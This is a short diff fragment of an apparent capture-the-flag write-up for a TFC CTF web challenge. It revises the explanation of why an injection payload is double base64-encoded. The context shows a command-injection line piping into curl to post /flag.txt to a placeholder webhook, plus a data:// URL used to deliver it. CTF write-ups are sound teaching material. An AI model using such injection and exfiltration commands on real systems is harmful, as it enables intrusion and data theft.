p4rr4/p4rr4.github.io/_posts/2024-08-04-TFC-CTF-Surfing-and-Safe-Content.md

 a | curl -X POST -d @/flag.txt <WEBHOOK>
 ```

-Now we double base64-encode it (`fetchContent` decodes it once, and then it is decoded again in the `exec` call) and we send the following URL to the challenge:
+Now we double base64-encode it (the PHP wrapper decodes it once and then `fetchContent` decodes it again in the return) and we send the following URL to the challenge:

 ```
 data://localhost/plain;base64,<DOUBLE_BASE64_PAYLOAD>